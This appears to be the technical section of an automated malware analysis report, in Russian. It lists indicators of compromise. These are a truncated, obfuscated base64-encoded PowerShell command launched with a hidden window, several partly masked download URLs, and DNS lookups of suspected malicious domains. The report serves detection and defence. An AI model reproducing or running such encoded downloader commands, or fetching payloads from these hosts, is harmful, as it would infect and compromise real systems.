Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABKAGYAMQBlAGkAbgBsAD0AJwBKAG0AbgBvAGUAbQA3ACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBDAHUAUgBgAEkAdABgAHkAUAByAG8AVABgAE8AYABjAG8ATAAiACAAPQAgAC...
- http://di####thluka.com/pxqu/H8rAC8327/
- http://du###scooter.nl/lzbwi/3M7zUXG/
- http://lv##ka.com/ftar/Bip463716/
- DNS ASK di####thluka.com
- DNS ASK bl######in-techminers.com
- DNS ASK jk#####solutions.com
- DNS ASK du###scooter.nl
- DNS ASK lv##ka.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABKAGYAMQBlAGkAbgBsAD0AJwBKAG0AbgBvAGUAbQA3ACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBDAHUAUgBgAEkAdABgAHkAUAByAG8AVABgAE8AYABjAG8ATAAiACAAPQAgAC...' (со скрытым окном)